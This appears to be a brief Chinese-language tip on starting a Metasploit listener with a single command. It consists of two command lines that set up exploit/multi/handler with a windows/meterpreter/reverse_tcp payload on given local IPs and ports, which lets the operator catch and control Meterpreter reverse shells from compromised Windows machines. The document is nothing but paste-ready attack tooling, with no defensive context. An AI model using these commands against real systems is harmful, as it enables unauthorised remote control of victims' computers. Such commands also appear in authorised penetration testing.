一句话开启监听,RT

    1. msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.3.128;set lport 8000;exploit -j"

    image.png
    或者

    1. handler -H 192.168.5.132 -P 4444 -p windows/meterpreter/reverse_tcp